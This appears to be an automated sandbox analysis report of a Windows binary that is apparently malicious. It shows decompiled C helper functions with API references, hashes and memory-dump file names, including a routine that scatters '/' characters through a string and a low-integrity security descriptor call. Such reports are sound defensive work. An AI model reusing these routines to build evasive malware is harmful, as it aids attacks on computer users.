API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: f16be97f2f6db60ac8023917c2ab66f2995122c1c0fe1e881202e1c71083ed98
Instruction ID: 2dcc3329b7bd3b842196ab5e4e4c9f0289ea1614e3764c95b814d34042dfc17f
Opcode Fuzzy Hash: f16be97f2f6db60ac8023917c2ab66f2995122c1c0fe1e881202e1c71083ed98
Instruction Fuzzy Hash: E5215E7690011DABCB94BFE4C885AFFB7BDAB44390B054526FB21A7100DB349E45DBA3

Uniqueness

Uniqueness Score: -1.00%

Function 00CF226B, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00CF226B(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0xcfd238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0xcfd250; // 0x1eaade80
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0xcfd250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x00cf2273
0x00cf2276
0x00cf227c
0x00cf2294
0x00cf2296
0x00cf229b
0x00cf229d
0x00cf22a0
0x00cf22a2
0x00cf22a5
0x00cf22a7
0x00cf22a7
0x00cf22a9
0x00cf22b4
0x00cf22b9
0x00cf22ca
0x00cf22d2
0x00cf22d7
0x00cf22da
0x00cf22dd
0x00cf22df
0x00cf22e2
0x00cf22e5
0x00cf22e5
0x00cf22e8
0x00cf22f3
0x00cf22f8
0x00cf2302

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00CF1AC3,00000000,?,?,00CF1EFB,?,031795B0), ref: 00CF2276
RtlAllocateHeap.NTDLL(00000000,?), ref: 00CF228E
memcpy.NTDLL(00000000,?,-00000008,?,?,?,00CF1AC3,00000000,?,?,00CF1EFB,?,031795B0), ref: 00CF22D2
memcpy.NTDLL(00000001,?,00000001), ref: 00CF22F3

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 13b487ffcac2a7b5721eca1ddb097302493769a907956747238c8bdbafa8a6c6
Instruction ID: d7063aed1a9dad7ed09283e188a0fd87c0b724cb94bf3c3dbd2d23307426dbb3
Opcode Fuzzy Hash: 13b487ffcac2a7b5721eca1ddb097302493769a907956747238c8bdbafa8a6c6
Instruction Fuzzy Hash: 8411E972A00119AFC7548BA9DC84FAEBBBEDBC4360B150176F605D7150EB709E05D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00CF203C, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00CF203C(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E00CF8D59(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0xcfc29c);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0xcfc29c);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x00cf2047
0x00cf204b
0x00cf204d
0x00cf204e
0x00cf2056
0x00cf2056
0x00cf205a
0x00000000
0x00000000
0x00cf2051
0x00cf2052
0x00cf2055
0x00cf2055
0x00cf2062
0x00cf2067
0x00cf206d
0x00cf2075
0x00cf207b
0x00cf207d
0x00cf2082
0x00cf2086
0x00cf2088
0x00cf208b
0x00cf2092
0x00cf2092
0x00cf209c
0x00cf209f
0x00cf20a0
0x00cf20a2
0x00cf20ae
0x00cf20ae
0x00cf20bb

APIs

StrChrA.SHLWAPI(?,00000020,00000000,031795AC,?,00CF5068,?,00CF9777,031795AC,?,00CF5068), ref: 00CF2056
StrTrimA.SHLWAPI(?,00CFC29C,00000002,?,00CF5068,?,00CF9777,031795AC,?,00CF5068), ref: 00CF2075
StrChrA.SHLWAPI(?,00000020,?,00CF5068,?,00CF9777,031795AC,?,00CF5068), ref: 00CF2080
StrTrimA.SHLWAPI(00000001,00CFC29C,?,00CF5068,?,00CF9777,031795AC,?,00CF5068), ref: 00CF2092

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 19f3e750dbce78425e49e65f3785fbc62a72621b19d3af8d8aea1220c92fe70c
Instruction ID: 525261ed44deb55e4d6f44b65b62b496e4860add788b1f14c37e68e381bc4172
Opcode Fuzzy Hash: 19f3e750dbce78425e49e65f3785fbc62a72621b19d3af8d8aea1220c92fe70c
Instruction Fuzzy Hash: AD01B57260531A6BC2319F6A8C49F3BBFA8EB95BA0F110519FA56D7241DF61CC01D2A2

Uniqueness

Uniqueness Score: -1.00%

Function 00CF5FC5, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00CF5FC5(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E00CF60BE(_t8, _t1);
				_t16 = E00CF8D59(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E00CF2A8E(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E00CF8D59(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E00CF677C(_t16);
				}
				return _t18;
			}

0x00cf5fd0
0x00cf5fd1
0x00cf5fd4
0x00cf5fd6
0x00cf5fe1
0x00cf5fe5
0x00cf5fea
0x00cf5fee
0x00cf5ff6
0x00cf5ffb
0x00cf6003
0x00cf6003
0x00cf600c
0x00cf6010
0x00cf6016
0x00cf6019
0x00cf601f
0x00cf601f
0x00cf6027
0x00cf6027
0x00cf602e
0x00cf602e
0x00cf6039

APIs

Part of subcall function 00CF8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00CF9099), ref: 00CF8D65

Part of subcall function 00CF2A8E: wsprintfA.USER32 ref: 00CF2AEA

lstrlen.KERNEL32(00CF5073,00000000,00000000,00000027,00000005,00000000,00000000,00CF56A8,74666F53,00000000,00CF5073,00CFD00C,?,00CF5073), ref: 00CF5FFB
lstrcpy.KERNEL32(00000000,00000000), ref: 00CF601F
lstrcat.KERNEL32(00000000,00000000), ref: 00CF6027

Strings

Soft, xrefs: 00CF5FD1, 00CF5FEA

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
String ID: Soft
API String ID: 393707159-3753413193
Opcode ID: b61494c52c1b002bf01b979ad2f6a2527f441675ed218f7ba919a219ba28b780
Instruction ID: 0ad5d51a261e26acabf67cb6db4e9f5687a1cc65f517d581c85c0f0bd5b7b6c5
Opcode Fuzzy Hash: b61494c52c1b002bf01b979ad2f6a2527f441675ed218f7ba919a219ba28b780
Instruction Fuzzy Hash: 9401A23210010EB7C7623BA8ACC9BBE3A69DF84395F144022FB155A151DF758A46DBA7

Uniqueness

Uniqueness Score: -1.00%

Function 00CFA457, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CFA457(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x00cfa461
0x00cfa465
0x00cfa47a
0x00cfa47c
0x00cfa481
0x00cfa487
0x00cfa489
0x00cfa48e
0x00cfa499
0x00cfa490
0x00cfa490
0x00cfa490
0x00cfa48e
0x00cfa4a7

APIs

memset.NTDLL ref: 00CFA465
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74B481D0), ref: 00CFA47A
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00CFA487
CloseHandle.KERNEL32(?), ref: 00CFA499

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: 4ae28b96a61682ffcccb2c3f33e40370c18e5c17956bc84d0f82f4d97718a3fa
Instruction ID: 7db1edcdf9eefcb81c262e3e7a69b9877ce51a12b8fd307d092144fc03125371
Opcode Fuzzy Hash: 4ae28b96a61682ffcccb2c3f33e40370c18e5c17956bc84d0f82f4d97718a3fa
Instruction Fuzzy Hash: 03F05EF110430CBFD3106F26DCC4D3BFBACEB45298B11992EF24682111DA71A8158A76

Uniqueness

Uniqueness Score: -1.00%

Function 00CF20BE, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CF20BE() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0xcfd26c; // 0x270
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0xcfd2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0xcfd26c; // 0x270
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xcfd238; // 0x2d80000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x00cf20be
0x00cf20c5
0x00cf210f
0x00cf2111
0x00cf2111
0x00cf20c9
0x00cf20cf
0x00cf20d4
0x00cf20d8
0x00cf20de
0x00cf20e5
0x00000000
0x00000000
0x00cf20e7
0x00cf20ec
0x00000000
0x00000000
0x00000000
0x00cf20ec
0x00cf20ee
0x00cf20f6
0x00cf20f9
0x00cf20f9
0x00cf20ff
0x00cf2106
0x00cf2109
0x00cf2109
0x00000000

APIs

SetEvent.KERNEL32(00000270,00000001,00CF91D0), ref: 00CF20C9
SleepEx.KERNEL32(00000064,00000001), ref: 00CF20D8
CloseHandle.KERNEL32(00000270), ref: 00CF20F9
HeapDestroy.KERNEL32(02D80000), ref: 00CF2109

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: b0bb3febb851ff07feb4fc55fd3c81c4cd2964797bcc6b6c0a0cd08a669789cd
Instruction ID: def0fb77118b1d5f19d7d16388a98b47220d0046da6b310a7dc953ba5980a447
Opcode Fuzzy Hash: b0bb3febb851ff07feb4fc55fd3c81c4cd2964797bcc6b6c0a0cd08a669789cd
Instruction Fuzzy Hash: F7F03031705319D7DB609B399D88B7EBBA9EB047517044110BE26D72A9CF70CD41E6A2

Uniqueness

Uniqueness Score: -1.00%

Function 00CF972C, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00CF972C(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0xcfd324; // 0x31795b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0xcfd324; // 0x31795b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0xcfd030) {
					HeapFree( *0xcfd238, 0, _t8);
				}
				_t14[1] = E00CF203C(_v0, _t14);
				_t11 =  *0xcfd324; // 0x31795b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x00cf972c
0x00cf972c
0x00cf9735
0x00cf9745
0x00cf9745
0x00cf974a
0x00cf974f
0x00000000
0x00000000
0x00cf973f
0x00cf973f
0x00cf9751
0x00cf9755
0x00cf9767
0x00cf9767
0x00cf9777
0x00cf977a
0x00cf977f
0x00cf9783
0x00cf9789

APIs

RtlEnterCriticalSection.NTDLL(03179570), ref: 00CF9735
Sleep.KERNEL32(0000000A,?,00CF5068), ref: 00CF973F
HeapFree.KERNEL32(00000000,00000000,?,00CF5068), ref: 00CF9767
RtlLeaveCriticalSection.NTDLL(03179570), ref: 00CF9783

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: bcda50e15123b9121a11a81b4a28bf5e7c56fdf79b4dec7e1dbaeb28c100b493
Instruction ID: d88f760f58b2bdb1dbcecbd4dff5c6c93d0b3a8b3e5579a431731d2d01f6e010
Opcode Fuzzy Hash: bcda50e15123b9121a11a81b4a28bf5e7c56fdf79b4dec7e1dbaeb28c100b493
Instruction Fuzzy Hash: 66F03471610208DBDB50AF68DEC8F3A37F9AB14741B114015F607C62A1CA30ED4ADA17

Uniqueness

Uniqueness Score: -1.00%

Function 00CF59EE, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00CF59EE() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0xcfd324; // 0x31795b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0xcfd324; // 0x31795b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0xcfd324; // 0x31795b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0xcfe836) {
					HeapFree( *0xcfd238, 0, _t10);
					_t7 =  *0xcfd324; // 0x31795b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x00cf59ee
0x00cf59f7
0x00cf5a07
0x00cf5a07
0x00cf5a0c
0x00cf5a11
0x00000000
0x00000000
0x00cf5a01
0x00cf5a01
0x00cf5a13
0x00cf5a18
0x00cf5a1c
0x00cf5a2f
0x00cf5a35
0x00cf5a35
0x00cf5a3e
0x00cf5a40
0x00cf5a44
0x00cf5a4a

APIs

RtlEnterCriticalSection.NTDLL(03179570), ref: 00CF59F7
Sleep.KERNEL32(0000000A,?,00CF5068), ref: 00CF5A01
HeapFree.KERNEL32(00000000,?,?,00CF5068), ref: 00CF5A2F
RtlLeaveCriticalSection.NTDLL(03179570), ref: 00CF5A44

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: b9463f89163dc0718b5c286d3f4266d23f67e27de38b89aa7a000e43cd3f7af8
Instruction ID: 4602a34fcf4eda8b7b4cbf481246e1c6fdd3e6722fa4c195d850ab5ddfccf31f
Opcode Fuzzy Hash: b9463f89163dc0718b5c286d3f4266d23f67e27de38b89aa7a000e43cd3f7af8
Instruction Fuzzy Hash: 32F0B274600244DFE758DB28DE99F3937E6AB28316B164118E703C72B0CA30AD59DA13

Uniqueness

Uniqueness Score: -1.00%

Function 00CF61FB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00CF61FB(void* __eax, char _a4) {

				 *0xcfd2b0 =  *0xcfd2b0 & 0x00000000;
				_push(0);
				_push(" 'H");
				_push(1);
				_t1 =  &_a4; // 0x4d283a53
				_push( *_t1);
				 *0xcfd2a8 = 0xc;
				L00CF57E9();
				return __eax;
			}

0x00cf61fb
0x00cf6202
0x00cf6204
0x00cf6209
0x00cf620b
0x00cf620b
0x00cf620f
0x00cf6219
0x00cf621e

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(S:(M,00000001, 'H,00000000), ref: 00CF6219

Strings

'H, xrefs: 00CF6204
S:(M, xrefs: 00CF620B

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: DescriptorSecurity$ConvertString
String ID: 'H$S:(M
API String ID: 3907675253-3832604773
Opcode ID: 10747365bd7e7e3a2037cc39fa596f9dab5deabd6dafdbe78c99a1ec438a5bb3
Instruction ID: e7735ca32c8ca4544c55879f2bd3dd136322454dc53f2c28b6db4a1875b86636
Opcode Fuzzy Hash: 10747365bd7e7e3a2037cc39fa596f9dab5deabd6dafdbe78c99a1ec438a5bb3
Instruction Fuzzy Hash: 76C08C74240300ABE210BF00CC02F2A7652B300700F100104F301200E0C3F08404E597

Uniqueness

Uniqueness Score: -1.00%

Function 00CF552D, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00CF552D(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00CF8D59(_t2);
				if(_t34 != 0) {
					_t30 = E00CF8D59(_t28);
					if(_t30 == 0) {
						E00CF677C(_t34);
					} else {
						_t39 = _a4;
						_t22 = E00CFA89A(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E00CFA89A(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x00cf552d
0x00cf5537
0x00cf5539
0x00cf553f
0x00cf553f
0x00cf5548
0x00cf554c
0x00cf5558
0x00cf555c
0x00cf55d0
0x00cf555e
0x00cf555e
0x00cf5562
0x00cf5567
0x00cf556c
0x00cf5586
0x00cf5575
0x00cf5575
0x00cf5579
0x00cf557c
0x00cf5581
0x00cf5581
0x00cf558b
0x00cf55b3
0x00cf55b9
0x00cf55bc
0x00cf558d
0x00cf558f
0x00cf5597
0x00cf55a2
0x00cf55a7
0x00cf55a7
0x00cf55c3
0x00cf55ca
0x00cf55cb
0x00cf55cb
0x00cf555c
0x00cf55db

APIs

lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,00CF8CFF,?,?,?,?,00000102,00CF3331,?,?,00000000), ref: 00CF5539

Part of subcall function 00CF8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00CF9099), ref: 00CF8D65

Part of subcall function 00CFA89A: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00CF5567,00000000,00000001,00000001,?,?,00CF8CFF,?,?,?,?,00000102), ref: 00CFA8A8
Part of subcall function 00CFA89A: StrChrA.SHLWAPI(?,0000003F,?,?,00CF8CFF,?,?,?,?,00000102,00CF3331,?,?,00000000,00000000), ref: 00CFA8B2

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00CF8CFF,?,?,?,?,00000102,00CF3331,?), ref: 00CF5597
lstrcpy.KERNEL32(00000000,00000000), ref: 00CF55A7
lstrcpy.KERNEL32(00000000,00000000), ref: 00CF55B3

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 6f56c700c8c23c6942869f9156fca571dbf305673536638212da9a968d772ac6
Instruction ID: bf39c6a1587cb602e58ed469acff9439deda26103ab1c37e3bb1384246d6e1c5
Opcode Fuzzy Hash: 6f56c700c8c23c6942869f9156fca571dbf305673536638212da9a968d772ac6
Instruction Fuzzy Hash: 3521C07250061DEFCB426FB5D888BBEBFB99F06380B144051FB059B211DB31DA0197A2

Uniqueness

Uniqueness Score: -1.00%

Function 00CF1FE0, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CF1FE0(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E00CF8D59(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x00cf1ff5
0x00cf1ff9
0x00cf2003
0x00cf2008
0x00cf200d
0x00cf200f
0x00cf2017
0x00cf201c
0x00cf202a
0x00cf202f
0x00cf2039

APIs

lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,0317936C,?,00CF5D0B,004F0053,0317936C,?,?,?,?,?,?,00CF2885), ref: 00CF1FF0
lstrlenW.KERNEL32(00CF5D0B,?,00CF5D0B,004F0053,0317936C,?,?,?,?,?,?,00CF2885), ref: 00CF1FF7

Part of subcall function 00CF8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00CF9099), ref: 00CF8D65

memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,00CF5D0B,004F0053,0317936C,?,?,?,?,?,?,00CF2885), ref: 00CF2017
memcpy.NTDLL(74B069A0,00CF5D0B,00000002,00000000,004F0053,74B069A0,?,?,00CF5D0B,004F0053,0317936C), ref: 00CF202A

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: df510b93fc89e582cbe09554f78a33beada0cc1a072543df46b06cfdbe838049
Instruction ID: f49e7e3ffb18d275510499d1f7b4609a879ca655fdebd8373541b106d7baa67f
Opcode Fuzzy Hash: df510b93fc89e582cbe09554f78a33beada0cc1a072543df46b06cfdbe838049
Instruction Fuzzy Hash: 0BF03C3690011DBB8F119BA9DC85DAE7BACEF482547154462BA0497111EB31EA149BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CF2773, Relevance: 5.0, APIs: 4, Instructions: 24stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00000000,00CF1F32,616D692F,00000000), ref: 00CF277F
lstrlen.KERNEL32(?), ref: 00CF2787

Part of subcall function 00CF8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00CF9099), ref: 00CF8D65

lstrcpy.KERNEL32(00000000,?), ref: 00CF279E
lstrcat.KERNEL32(00000000,?), ref: 00CF27A9

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: a974f24073d26aaf51d0ff5e304f1cf8e1eba465b8b00855e32e1936b68dcf84
Instruction ID: f47e917162818cc93d707a909521e3701a66a20a823c271ef3f499e49176bbcc
